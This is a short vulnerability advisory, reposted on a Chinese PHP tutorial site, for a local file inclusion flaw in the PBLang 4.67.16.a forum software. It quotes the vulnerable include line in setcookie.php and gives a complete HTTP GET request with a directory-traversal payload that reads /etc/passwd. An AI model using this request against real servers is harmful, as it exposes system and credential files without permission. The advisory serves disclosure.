来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: [PBLang local file include vulnerability]关键词: [Software PBLang 4.67.16.a]作者: ~Pseudo: [Number 7];软件下载地址: [http://garr.dl.sourceforge.net/project/pblang/Full%20versio......
|
标题: [PBLang local file include vulnerability]
关键词: ["Software PBLang 4.67.16.a"] 作者: ~Pseudo: [Number 7]; 软件下载地址: [http://garr.dl.sourceforge.net/project/pblang/Full%20versions/PBLang%204.67.16.a%20no%20graphics/PBLang-4.67.16.a-nographics.zip] 影响版本: [4.67.16.a] 测试平台: [wINDOWS,Linux] ______________________________________________________________________________________ 证明: 位于setcookie.php include($dbpath."/members/".$u); In order to successfully perform this attack the attacker must have the full path where the files are uploaded, and it is easy to get making a request like this: GET http:// www.2cto.com /path/setcookie.php?u=../../../../../etc/passwd HTTP/1.1 Cookie: eXtplorer=eRlQPZSWiGt2zRpFlXr6qCgja6DiLumU Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) For requests like this i use acunetix :D ___________________________________________________ |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
